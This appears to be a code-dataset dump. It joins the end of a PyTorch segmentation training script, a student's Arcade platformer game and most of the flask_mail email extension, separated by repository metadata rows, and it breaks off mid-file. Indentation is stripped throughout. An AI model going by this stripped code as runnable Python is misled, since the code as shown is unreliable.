logger = logging.getLogger(__name__)
@try_except
def populate_task0(segmenter, train_loader, kd_net, n_train, do_kd=False):
"""Populate data for task0 - the outputs of encoder.
Args:
segmenter (nn.Module) : segmentation network
train_loader (DataLoader) : training data iterator
kd_net (nn.Module) : teacher network if any
n_train (int) : how many samples to pre-compute
do_kd (boolean) : whether to do knowledge distillation
"""
Xy_train = defaultdict(list)
segmenter.eval()
# Populate Xy_train with encoder's outputs
try:
train_loader.dataset.set_stage("train")
except AttributeError:
train_loader.dataset.dataset.set_stage("train")
train_loader.batch_sampler.batch_size = 1 # to not run out of memory
with torch.no_grad():
n_curr = 0
for sample in train_loader:
image = sample["image"].float().npu()
target = sample["mask"].float()
enc_outputs = segmenter.module.encoder(image)
for i, enc_output in enumerate(enc_outputs):
Xy_train[i].extend(enc_output.unbind(0))
Xy_train["y"].extend(
nn.functional.interpolate(
target[:, None], size=enc_outputs[0].size()[2:], mode="nearest"
)
.long()
.squeeze(dim=1)
.npu()
.unbind(0)
)
if do_kd:
kd_y = kd_net(image)
Xy_train["kd_y"].extend(
nn.functional.interpolate(
kd_y,
size=enc_outputs[0].size()[2:],
mode="bilinear",
align_corners=False,
).unbind(0)
)
n_curr += image.size(0)
if n_curr >= n_train:
# By default we are taking the size of the first encoder output
# as our output size
Xy_train["out_size"] = enc_outputs[0].size()[2:]
logger.info(" Populated Xy_train, N = {}".format(n_curr))
break
# concat into a single tensor
for k, v in Xy_train.items():
if k != "out_size":
Xy_train[k] = torch.stack(v)
return Xy_train
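# --- Hedged usage sketch (added for illustration, not part of the original
# script). populate_task0 pre-computes encoder outputs once so the decoder
# can be trained repeatedly without re-running the encoder. Assuming
# `segmenter`, `train_loader` and an optional teacher `kd_net` were built
# by the caller, a call might look like:
#
#   Xy_train = populate_task0(segmenter, train_loader, kd_net,
#                             n_train=512, do_kd=True)
#   # Xy_train[i] then holds the i-th encoder output per sample,
#   # Xy_train["y"] the downsampled targets, Xy_train["kd_y"] the teacher
#   # logits, and Xy_train["out_size"] the common output size.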
@try_except
def train_task0(
Xy_train,
segmenter,
optim_dec,
epoch,
segm_crit,
kd_crit,
batch_size,
freeze_bn,
do_kd,
kd_coeff,
dec_grad_clip,
do_polyak,
avg_param=None,
polyak_decay=0.9,
aux_weight=0,
):
"""Training task0 segmenter - only decoder
Args:
Xy_train (dict) : pre-computed data
segmenter (nn.Module) : segmentation network
optim_dec (optim) : optimiser for decoder
epoch (int) : current segm epoch
segm_crit (nn.Loss) : segmentation criterion
kd_crit (nn.Loss) : knowledge distillation criterion
batch_size (int) : batch size used for training
freeze_bn (bool) : whether to keep batch norm statistics intact
do_kd (bool) : whether to do knowledge distillation
kd_coeff (float) : loss coefficient for knowledge distillation
dec_grad_clip (float) : clip decoder's parameters' norm to this value
do_polyak (bool) : whether to do Polyak averaging
avg_param : copy of parameters for Polyak averaging
polyak_decay (float) : momentum for Polyak averaging
aux_weight (float) : loss coefficient for auxiliary outputs
"""
# Train
n_examples = Xy_train[0].size(0)
batch_size = min(batch_size, n_examples)
n_passes = n_examples // batch_size
indices = np.arange(n_examples)
batch_time = AverageMeter()
losses = AverageMeter()
# Update BNs if not set otherwise
segmenter.module.decoder.train()
if freeze_bn:
for m in segmenter.module.decoder.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
np.random.shuffle(indices)
for i in range(n_passes):
start = time.time()
train_idx = indices[(i * batch_size) : (i + 1) * batch_size]
encoder_outputs = [
Xy_train[key][train_idx]
for key in Xy_train.keys()
if key not in ["y", "kd_y", "out_size"]
]
output = segmenter.module.decoder(encoder_outputs)
if isinstance(output, tuple):
output, aux_outs = output
# NOTE: Output size can change as some layers will not be connected
output = nn.functional.interpolate(
output, size=Xy_train["out_size"], mode="bilinear", align_corners=False
)
soft_output = nn.LogSoftmax(dim=1)(output)
# Compute loss and backpropagate
loss = segm_crit(soft_output, Xy_train["y"][train_idx])
if do_kd:
kd_loss = kd_crit(output, Xy_train["kd_y"][train_idx])
loss += kd_coeff * kd_loss
if aux_weight > 0:
for aux_out in aux_outs:
aux_out = nn.Upsample(
size=Xy_train["out_size"], mode="bilinear", align_corners=False
)(aux_out)
aux_out = nn.LogSoftmax(dim=1)(aux_out)
# Compute loss and backpropagate
loss += segm_crit(aux_out, Xy_train["y"][train_idx]) * aux_weight
optim_dec.zero_grad()
loss.backward()
# Clip gradients' norm
nn.utils.clip_grad_norm_(segmenter.module.decoder.parameters(), dec_grad_clip)
optim_dec.step()
losses.update(loss.item())
batch_time.update(time.time() - start)
if do_polyak:
for p, avg_p in zip(segmenter.module.decoder.parameters(), avg_param):
avg_p.mul_(polyak_decay).add_(p.data, alpha=1.0 - polyak_decay)
logger.info(
" Train epoch: {}\t"
"Avg. Loss: {:.3f}\t"
"Avg. Time: {:.3f}".format(epoch, losses.avg, batch_time.avg)
)
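# --- Hedged usage sketch (added for illustration, not part of the original
# script). train_task0 consumes the tensors produced by populate_task0
# above, one decoder-only epoch per call. `optim_dec`, `segm_crit` and
# `kd_crit` are assumed to be constructed by the caller:
#
#   for epoch in range(num_task0_epochs):
#       train_task0(Xy_train, segmenter, optim_dec, epoch, segm_crit,
#                   kd_crit, batch_size=64, freeze_bn=True, do_kd=True,
#                   kd_coeff=0.3, dec_grad_clip=3.0, do_polyak=False)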
@try_except
def train_segmenter(
segmenter,
train_loader,
optim_enc,
optim_dec,
epoch,
segm_crit,
freeze_bn,
enc_grad_clip,
dec_grad_clip,
do_polyak,
print_every=10,
aux_weight=-1,
avg_param=None,
polyak_decay=0.99,
):
"""Training segmenter end-to-end.
Args:
segmenter (nn.Module) : segmentation network
train_loader (DataLoader) : training data iterator
optim_enc (optim) : optimiser for encoder
optim_dec (optim) : optimiser for decoder
epoch (int) : current segmenter epoch
segm_crit (nn.Loss) : segmentation criterion
freeze_bn (bool) : whether to keep batch norm statistics intact
enc_grad_clip (float) : clip encoder's parameters' norm to this value
dec_grad_clip (float) : clip decoder's parameters' norm to this value
do_polyak (bool) : whether to do Polyak averaging
print_every (int) : how often to print out information
aux_weight (float) : loss coefficient for auxiliary outputs
avg_param : copy of parameters for Polyak averaging
polyak_decay (float) : momentum for Polyak averaging
"""
try:
train_loader.dataset.set_stage("train")
except AttributeError:
train_loader.dataset.dataset.set_stage("train") # for subset
segmenter.train()
if freeze_bn:
for m in segmenter.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
batch_time = AverageMeter()
losses = AverageMeter()
for i, sample in enumerate(train_loader):
start = time.time()
image = sample["image"].float().npu()
target = sample["mask"].npu()
target_var = target.float()  # Variable wrapper is a no-op in modern PyTorch
# Compute output
output = segmenter(image)
if isinstance(output, tuple):
output, aux_outs = output
target_var = nn.functional.interpolate(
target_var[:, None], size=output.size()[2:], mode="nearest"
).long()[:, 0]
soft_output = nn.LogSoftmax(dim=1)(output)
# Compute loss and backpropagate
loss = segm_crit(soft_output, target_var)
# Compute auxiliary loss
if aux_weight > 0:
for aux_out in aux_outs:
aux_out = nn.Upsample(
size=target_var.size()[1:], mode="bilinear", align_corners=False
)(aux_out)
aux_out = nn.LogSoftmax(dim=1)(aux_out)
# Compute loss and backpropagate
loss += segm_crit(aux_out, target_var) * aux_weight
optim_enc.zero_grad()
optim_dec.zero_grad()
loss.backward()
# Clip gradients' norm
if enc_grad_clip > 0:
nn.utils.clip_grad_norm_(
segmenter.module.encoder.parameters(), enc_grad_clip
)
if dec_grad_clip > 0:
nn.utils.clip_grad_norm_(
segmenter.module.decoder.parameters(), dec_grad_clip
)
optim_enc.step()
optim_dec.step()
if do_polyak:
for p, avg_p in zip(segmenter.parameters(), avg_param):
avg_p.mul_(polyak_decay).add_(p.data, alpha=1.0 - polyak_decay)
losses.update(loss.item())
batch_time.update(time.time() - start)
if i % print_every == 0:
logger.info(
" Train epoch: {} [{}/{}]\t"
"Avg. Loss: {:.3f}\t"
"Avg. Time: {:.3f}".format(
epoch, i, len(train_loader), losses.avg, batch_time.avg
)
)
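# --- Hedged usage sketch (added for illustration, not part of the original
# script). train_segmenter trains encoder and decoder end-to-end, one call
# per epoch; the optimisers and criterion are assumed to exist already:
#
#   for epoch in range(num_epochs):
#       train_segmenter(segmenter, train_loader, optim_enc, optim_dec,
#                       epoch, segm_crit, freeze_bn=False,
#                       enc_grad_clip=3.0, dec_grad_clip=3.0,
#                       do_polyak=False)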
| [
"[email protected]"
] | |
639eb6874b95a9e96a37069b983815ce6ac2bc13 | 227c102ed508ad2b1d046340dcb598a7b16e2925 | /.history/Forritun/Verkefni með einkunn/Lokaverkefni/lokaverkefni_20201208144514.py | abaca0b10d37452fa155d2847cc3949d691d5db1 | [] | no_license | larusarmann/Skoli-haust-2020 | 298e48f1c20d7ec0c92124018650253f13bcbb2f | 3061a0238b74919daccaa74117bc1c32b3436619 | refs/heads/master | 2023-02-07T09:15:45.493928 | 2020-12-09T19:46:53 | 2020-12-09T19:46:53 | 292,543,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,104 | py | """
Show how to do enemies in a platformer
Artwork from: http://kenney.nl
Tiled available from: http://www.mapeditor.org/
If Python and Arcade are installed, this example can be run from the command line with:
python -m arcade.examples.sprite_enemies_in_platformer
"""
import random
import arcade
import os
SPRITE_SCALING_COIN = 12
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Lárus"
VIEWPORT_MARGIN = 40
RIGHT_MARGIN = 150
MOVEMENT_SPEED = 5
JUMP_SPEED = 14
GRAVITY = 0.5
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self):
"""
Initializer
"""
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, "Final Project Lárus")
# Sprite lists
self.coin_list = None
self.player_list = None
self.wall_list = None
self.flag=True
self.score = 0
# Set up the player
self.player_sprite = None
# This variable holds our simple "physics engine"
self.physics_engine = None
# Manage the view port
self.view_left = 0
self.view_bottom = 0
def setup(self):
""" Set up the game and initialize the variables. """
self.wall_list = arcade.SpriteList()
self.enemy_list = arcade.SpriteList()
self.player_list = arcade.SpriteList()
self.coin_list = arcade.SpriteList()
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/rpgTile019.png", SPRITE_SCALING)
wall.bottom = 0
wall.left = x
self.wall_list.append(wall)
# Draw the platform
for x in range(SPRITE_SIZE * 3, SPRITE_SIZE * 8, SPRITE_SIZE):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/rpgTile019.png", SPRITE_SCALING)
wall.bottom = SPRITE_SIZE * 3
wall.left = x
self.wall_list.append(wall)
# Draw the crates
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE * 5):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/boxCrate_double.png", SPRITE_SCALING)
wall.bottom = SPRITE_SIZE
wall.left = x
self.wall_list.append(wall)
for i in range(7):
# Create the coin instance
coin = arcade.Sprite("C:\Git\Skoli-haust-2020\Forritun\Verkefni með einkunn\Lokaverkefni\images\coinGold.png", SPRITE_SCALING / 2)
# Position the coin
coin.center_x = random.randrange(SCREEN_WIDTH)
coin.center_y = random.randrange(600)
# Add the coin to the lists
self.coin_list.append(coin)
# -- Draw an enemy on the ground
enemy = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character_zombie_idle.png", SPRITE_SCALING)
enemy.bottom = SPRITE_SIZE
enemy.left = SPRITE_SIZE * 2
# Set enemy initial speed
enemy.change_x = 2
self.enemy_list.append(enemy)
# -- Draw a enemy on the platform
enemy = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character_zombie_idle.png", SPRITE_SCALING)
enemy.bottom = SPRITE_SIZE * 4
enemy.left = SPRITE_SIZE * 4
# Set boundaries on the left/right the enemy can't cross
enemy.boundary_right = SPRITE_SIZE * 8
enemy.boundary_left = SPRITE_SIZE * 3
enemy.change_x = 2
self.enemy_list.append(enemy)
# -- Set up the player
self.player_sprite = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character1.png", SPRITE_SCALING)
self.player_list.append(self.player_sprite)
# Starting position of the player
self.player_sprite.center_x = 64
self.player_sprite.center_y = 270
self.physics_engine = arcade.PhysicsEnginePlatformer(self.player_sprite,
self.wall_list,
gravity_constant=GRAVITY)
# Set the background color
arcade.set_background_color(arcade.color.AMAZON)
def on_draw(self):
arcade.start_render()
if self.flag:
arcade.set_background_color(arcade.color.BLUE)
arcade.draw_text("Lárus Ármann Kjartansson\n Náðu fimm peningum til að vinna leikin \n Ýttu á Q til að hefja leik", 10,300, arcade.color.WHITE, 24)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
elif self.score >=5 and self.flag==False:
arcade.set_background_color(arcade.color.BUBBLES)
arcade.draw_text("Leik lokið ",self.view_left+200,self.view_bottom+300, arcade.color.CHERRY, 44)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
else:
arcade.set_background_color(arcade.color.AMAZON)
self.wall_list.draw()
self.player_list.draw()
arcade.draw_text(f"stig: {self.score}", self.player_sprite.center_x-15,self.player_sprite.center_y+30, arcade.color.WHITE, 14)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
self.coin_list.draw()
def draw_game(self):
"""
Draw all the sprites, along with the score.
"""
# Draw all the sprites.
self.player_list.draw()
self.coin_list.draw()
# Put the text on the screen.
output = f"Score: {self.score}"
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
def on_key_press(self, key, modifiers):
"""
Called whenever the mouse moves.
"""
if key == arcade.key.Q:
self.flag=False
else:
if key == arcade.key.UP:
if self.physics_engine.can_jump():
self.player_sprite.change_y = JUMP_SPEED
elif key == arcade.key.LEFT:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.RIGHT:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""
Called when the user presses a mouse button.
"""
if key == arcade.key.LEFT or key == arcade.key.RIGHT:
self.player_sprite.change_x = 0
def on_update(self, delta_time):
self.physics_engine.update()
self.coin_list.update()
hit_list = arcade.check_for_collision_with_list(self.player_sprite, self.coin_list)
if len(hit_list)>0:
for pening in hit_list:
pening.remove_from_sprite_lists()
self.score=self.score+1
# --- Manage Scrolling ---
# Keep track of if we changed the boundary. We don't want to call the
# set_viewport command if we didn't change the view port.
changed = False
# Scroll left
left_boundary = self.view_left + VIEWPORT_MARGIN
if self.player_sprite.left < left_boundary:
self.view_left -= left_boundary - self.player_sprite.left
changed = True
# Scroll right
right_boundary = self.view_left + SCREEN_WIDTH - VIEWPORT_MARGIN
if self.player_sprite.right > right_boundary:
self.view_left += self.player_sprite.right - right_boundary
changed = True
# Scroll up
top_boundary = self.view_bottom + SCREEN_HEIGHT - VIEWPORT_MARGIN
if self.player_sprite.top > top_boundary:
self.view_bottom += self.player_sprite.top - top_boundary
changed = True
# Scroll down
bottom_boundary = self.view_bottom + VIEWPORT_MARGIN
if self.player_sprite.bottom < bottom_boundary:
self.view_bottom -= bottom_boundary - self.player_sprite.bottom
changed = True
# Make sure our boundaries are integer values. While the view port does
# support floating point numbers, for this application we want every pixel
# in the view port to map directly onto a pixel on the screen. We don't want
# any rounding errors.
self.view_left = int(self.view_left)
self.view_bottom = int(self.view_bottom)
# If we changed the boundary values, update the view port to match
if changed:
arcade.set_viewport(self.view_left,
SCREEN_WIDTH + self.view_left - 1,
self.view_bottom,
SCREEN_HEIGHT + self.view_bottom - 1)
def main():
window = MyGame()
window.setup()
arcade.run()
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
4e05342bbe67e0b1ef38fe46f34073cc3d59822c | 0567b686db4d05b44a70fdfd7a61ed07f3be1fb4 | /flask_mail.py | 50630a3d0f3206394769458abef4da70620487e8 | [
"MIT"
] | permissive | achiang/flask-unchained | 624271d903a8d2af2c15d83c79571e8b5f91a56e | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | refs/heads/master | 2020-04-19T20:21:10.731764 | 2018-12-29T07:06:14 | 2018-12-29T07:06:14 | 168,411,738 | 0 | 0 | MIT | 2019-01-30T20:39:42 | 2019-01-30T20:39:41 | null | UTF-8 | Python | false | false | 22,070 | py | # -*- coding: utf-8 -*-
"""
flaskext.mail
~~~~~~~~~~~~~
Flask extension for sending email.
Copyright (c) 2010 by danjac.
Some rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* The names of the contributors may not be used to endorse or
promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import with_statement
import re
import smtplib
import sys
import time
import unicodedata
from contextlib import contextmanager
from email import charset
from email.encoders import encode_base64
from email.header import Header
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formataddr, formatdate, make_msgid, parseaddr
import blinker
from flask import current_app
try:
from email import policy
message_policy = policy.SMTP
except ImportError:
message_policy = None
__version__ = '0.9.3'
PY3 = sys.version_info[0] == 3
PY34 = PY3 and sys.version_info[1] >= 4
if PY3:
string_types = str,
text_type = str
else:
string_types = basestring, # noqa: F821
text_type = unicode # noqa: F821
charset.add_charset('utf-8', charset.SHORTEST, None, 'utf-8')
class FlaskMailUnicodeDecodeError(UnicodeDecodeError):
def __init__(self, obj, *args):
self.obj = obj
UnicodeDecodeError.__init__(self, *args)
def __str__(self):
original = UnicodeDecodeError.__str__(self)
return '%s. You passed in %r (%s)' % (
original, self.obj, type(self.obj)
)
def force_text(s, encoding='utf-8', errors='strict'):
"""
Similar to smart_text, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if isinstance(s, text_type):
return s
try:
if not isinstance(s, string_types):
if PY3:
if isinstance(s, bytes):
s = text_type(s, encoding, errors)
else:
s = text_type(s)
elif hasattr(s, '__unicode__'):
s = s.__unicode__()
else:
s = text_type(bytes(s), encoding, errors)
else:
s = s.decode(encoding, errors)
except UnicodeDecodeError as e:
if not isinstance(s, Exception):
raise FlaskMailUnicodeDecodeError(s, *e.args)
else:
s = ' '.join([force_text(arg, encoding, errors)
for arg in s])
return s
def sanitize_subject(subject, encoding='utf-8'):
try:
subject.encode('ascii')
except UnicodeEncodeError:
try:
subject = Header(subject, encoding).encode()
except UnicodeEncodeError:
subject = Header(subject, 'utf-8').encode()
return subject
def sanitize_address(addr, encoding='utf-8'):
if isinstance(addr, string_types):
addr = parseaddr(force_text(addr))
nm, addr = addr
try:
nm = Header(nm, encoding).encode()
except UnicodeEncodeError:
nm = Header(nm, 'utf-8').encode()
try:
addr.encode('ascii')
except UnicodeEncodeError: # IDN
if '@' in addr:
localpart, domain = addr.split('@', 1)
try:
localpart = Header(localpart, encoding).encode()
except UnicodeEncodeError:
localpart = Header(localpart, 'utf-8').encode()
domain = domain.encode('idna').decode('ascii')
addr = '@'.join([localpart, domain])
else:
addr = Header(addr, encoding).encode()
return formataddr((nm, addr))
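# Hedged example (added for illustration, not part of the original module):
# sanitize_address accepts either a preformatted "Name <addr>" string or a
# (name, addr) tuple and returns a header-safe value, RFC 2047-encoding a
# non-ASCII display name and IDNA-encoding a non-ASCII domain, e.g.:
#
#   sanitize_address((u'J\xfcrgen', u'juergen@b\xfccher.example'))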
def sanitize_addresses(addresses, encoding='utf-8'):
return map(lambda e: sanitize_address(e, encoding), addresses)
def fix_recipients_list(recipients):
fixed_recipients = []
for recipient in recipients:
if not isinstance(recipient, string_types):
# Ensure that the name/email values are a tuple and not a list
fixed_recipients.append(tuple(recipient))
else:
fixed_recipients.append(recipient)
return fixed_recipients
def _has_newline(line):
"""Used by has_bad_header to check for \\r or \\n"""
if line and ('\r' in line or '\n' in line):
return True
return False
class Connection(object):
"""Handles connection to host."""
def __init__(self, mail):
self.mail = mail
def __enter__(self):
if self.mail.suppress:
self.host = None
else:
self.host = self.configure_host()
self.num_emails = 0
return self
def __exit__(self, exc_type, exc_value, tb):
if self.host and getattr(self.host, 'sock', None):
try:
self.host.quit()
except smtplib.SMTPServerDisconnected:
pass
def configure_host(self):
if self.mail.use_ssl:
host = smtplib.SMTP_SSL(self.mail.server, self.mail.port)
else:
host = smtplib.SMTP(self.mail.server, self.mail.port)
host.set_debuglevel(int(self.mail.debug))
if self.mail.use_tls:
(resp, reply) = host.starttls()
# Fix CVE-2016-0772 on old Python installations:
# a successful STARTTLS is answered with 220 ("Ready to start TLS", RFC 3207)
if resp != 220:
raise smtplib.SMTPResponseException(resp, reply)
if self.mail.username and self.mail.password:
host.login(self.mail.username, self.mail.password)
return host
def send(self, message, envelope_from=None):
"""Verifies and sends message.
:param message: Message instance.
:param envelope_from: Email address to be used in MAIL FROM command.
"""
assert message.send_to, "No recipients have been added"
assert message.sender, (
"The message does not specify a sender and a default sender "
"has not been configured")
if message.has_bad_headers():
raise BadHeaderError
if message.date is None:
message.date = time.time()
ret = None
if self.host:
ret = self.host.sendmail(
sanitize_address(envelope_from or message.sender),
list(sanitize_addresses(message.send_to)),
message.as_bytes() if PY3 else message.as_string(),
message.mail_options,
message.rcpt_options
)
email_dispatched.send(message, app=current_app._get_current_object())
self.num_emails += 1
if self.num_emails == self.mail.max_emails:
self.num_emails = 0
if self.host:
self.host.quit()
self.host = self.configure_host()
return ret
def send_message(self, *args, **kwargs):
"""Shortcut for send(msg).
Takes same arguments as Message constructor.
:versionadded: 0.3.5
"""
return self.send(Message(*args, **kwargs))
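# Hedged example (added for illustration, not part of the original module):
# reusing one SMTP connection for bulk mail. `mail` is assumed to be an
# initialized Mail instance and `users` an iterable of (name, email) pairs:
#
#   with mail.connect() as conn:
#       for name, email in users:
#           conn.send_message(subject="Hello, %s" % name,
#                             recipients=[email],
#                             body="...")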
class BadHeaderError(Exception):
pass
class Attachment(object):
"""Encapsulates file attachment information.
:versionadded: 0.3.5
:param filename: filename of attachment
:param content_type: file mimetype
:param data: the raw file data
:param disposition: content-disposition (if any)
:param content_id: content-id for inline reference
"""
def __init__(self, filename=None, content_type=None, data=None,
disposition=None, headers=None, content_id=None):
self.filename = filename
self.content_type = content_type
self.data = data
self.disposition = disposition or 'attachment'
self.headers = headers or {}
self.content_id = content_id
class Message(object):
"""Encapsulates an email message.
:param subject: email subject header
:param recipients: list of email addresses
:param body: plain text message
:param html: HTML message
:param alts: A dict or an iterable to go through dict() that contains
multipart alternatives
:param sender: email sender address, or **MAIL_DEFAULT_SENDER** by default
:param cc: CC list
:param bcc: BCC list
:param attachments: list of Attachment instances
:param reply_to: reply-to address
:param date: send date
:param charset: message character set
:param extra_headers: A dictionary of additional headers for the message
:param mail_options: A list of ESMTP options to be used in MAIL FROM
:param rcpt_options: A list of ESMTP options to be used in RCPT commands
:param subtype: Media subtype name for a message
"""
def __init__(self, subject='',
recipients=None,
body=None,
html=None,
alts=None,
sender=None,
cc=None,
bcc=None,
attachments=None,
reply_to=None,
date=None,
charset=None,
extra_headers=None,
mail_options=None,
rcpt_options=None,
subtype=None):
sender = sender or current_app.extensions['mail'].default_sender
if isinstance(sender, tuple):
sender = "%s <%s>" % sender
self.recipients = recipients or []
self.subject = subject
self.sender = sender
self.reply_to = reply_to
self.cc = cc or []
self.bcc = bcc or []
self.body = body
self.alts = dict(alts or {})
self.html = html
self.date = date
self.msgId = make_msgid()
self.charset = charset
self.extra_headers = extra_headers
self.subtype = subtype
self.mail_options = mail_options or []
self.rcpt_options = rcpt_options or []
self.attachments = attachments or []
@property
def recipients(self):
return self._recipients
@recipients.setter
def recipients(self, recipients):
self._recipients = fix_recipients_list(recipients)
@property
def cc(self):
return self._cc
@cc.setter
def cc(self, recipients):
self._cc = fix_recipients_list(recipients)
@property
def bcc(self):
return self._bcc
@bcc.setter
def bcc(self, recipients):
self._bcc = fix_recipients_list(recipients)
@property
def send_to(self):
return set(self.recipients) | set(self.bcc or ()) | set(self.cc or ())
@property
def html(self):
return self.alts.get('html')
@html.setter
def html(self, value):
if value is None:
self.alts.pop('html', None)
else:
self.alts['html'] = value
def _mimetext(self, text, subtype=None):
"""Creates a MIMEText object with the given subtype (default: 'plain')
If the text is unicode, the utf-8 charset is used.
"""
subtype = subtype or 'plain'
charset = self.charset or 'utf-8'
return MIMEText(text, _subtype=subtype, _charset=charset)
def _message(self):
"""Creates the email"""
ascii_attachments = current_app.extensions['mail'].ascii_attachments
encoding = self.charset or 'utf-8'
attachments = self.attachments or []
if len(attachments) == 0 and not self.alts:
# No html content and zero attachments means plain text
msg = self._mimetext(self.body, self.subtype)
elif len(attachments) > 0 and not self.alts:
# No html and at least one attachment means multipart
subtype = self.subtype or 'mixed'
msg = MIMEMultipart(_subtype=subtype)
msg.attach(self._mimetext(self.body))
else:
# Anything else
subtype = self.subtype or 'mixed'
msg = MIMEMultipart(_subtype=subtype)
alternative = MIMEMultipart(_subtype='alternative')
alternative.attach(self._mimetext(self.body))
for mimetype, content in self.alts.items():
alternative.attach(self._mimetext(content, mimetype))
msg.attach(alternative)
if self.subject:
msg['Subject'] = sanitize_subject(force_text(self.subject),
encoding)
msg['From'] = sanitize_address(self.sender, encoding)
msg['To'] = ', '.join(
list(set(sanitize_addresses(self.recipients, encoding)))
)
msg['Date'] = formatdate(self.date, localtime=True)
# see RFC 5322 section 3.6.4.
msg['Message-ID'] = self.msgId
if self.cc:
msg['Cc'] = ', '.join(
list(set(sanitize_addresses(self.cc, encoding)))
)
if self.reply_to:
msg['Reply-To'] = sanitize_address(self.reply_to, encoding)
if self.extra_headers:
for k, v in self.extra_headers.items():
msg[k] = v
SPACES = re.compile(r'[\s]+', re.UNICODE)
for attachment in attachments:
f = MIMEBase(*attachment.content_type.split('/'))
f.set_payload(attachment.data)
encode_base64(f)
filename = attachment.filename
if filename and ascii_attachments:
# force filename to ascii
filename = unicodedata.normalize('NFKD', filename)
filename = filename.encode('ascii', 'ignore').decode('ascii')
filename = SPACES.sub(u' ', filename).strip()
try:
filename and filename.encode('ascii')
except UnicodeEncodeError:
if not PY3:
filename = filename.encode('utf8')
filename = ('UTF8', '', filename)
f.add_header('Content-Disposition',
attachment.disposition,
filename=filename)
for key, value in attachment.headers.items():
f.add_header(key, value)
if attachment.content_id:
try:
f.replace_header('Content-ID', attachment.content_id)
except KeyError:
f.add_header('Content-ID', attachment.content_id)
msg.attach(f)
if message_policy:
msg.policy = message_policy
return msg
def as_string(self):
return self._message().as_string()
def as_bytes(self):
return self._message().as_string().encode(self.charset or 'utf-8')
def __str__(self):
return self.as_string()
def __bytes__(self):
return self.as_bytes()
def has_bad_headers(self):
"""
Checks for bad headers i.e. newlines in subject, sender or recipients.
RFC5322 allows multiline CRLF with trailing whitespace (FWS) in headers
"""
headers = [self.sender, self.reply_to] + self.recipients
for header in headers:
if _has_newline(header):
return True
if self.subject:
if _has_newline(self.subject):
for linenum, line in enumerate(self.subject.split('\r\n')):
if not line:
return True
if linenum > 0 and line[0] not in '\t ':
return True
if _has_newline(line):
return True
if len(line.strip()) == 0:
return True
return False
def is_bad_headers(self):
from warnings import warn
warn(DeprecationWarning('is_bad_headers is deprecated, use the'
' new has_bad_headers method instead.'),
stacklevel=1)
return self.has_bad_headers()
def send(self, connection):
"""
Verifies and sends the message.
"""
return connection.send(self)
def add_recipient(self, recipient):
"""
Adds another recipient to the message.
:param recipient: email address of recipient.
"""
self.recipients.append(recipient)
def attach(self,
filename=None,
content_type=None,
data=None,
disposition=None,
headers=None,
content_id=None):
"""
Adds an attachment to the message.
:param filename: filename of attachment
:param content_type: file mimetype
:param data: the raw file data
:param disposition: content-disposition (if any)
:param content_id: content-id
"""
self.attachments.append(
Attachment(filename, content_type, data, disposition,
headers, content_id)
)
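# Hedged example (added for illustration, not part of the original module):
# building a message with an attachment inside an application context; the
# file path and address below are placeholders:
#
#   msg = Message(subject="Report",
#                 recipients=["[email protected]"],
#                 body="See the attached report.")
#   with open("report.pdf", "rb") as fp:
#       msg.attach("report.pdf", "application/pdf", fp.read())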
class _MailMixin(object):
@contextmanager
def record_messages(self):
"""
Records all messages. Use in unit tests for example::
with mail.record_messages() as outbox:
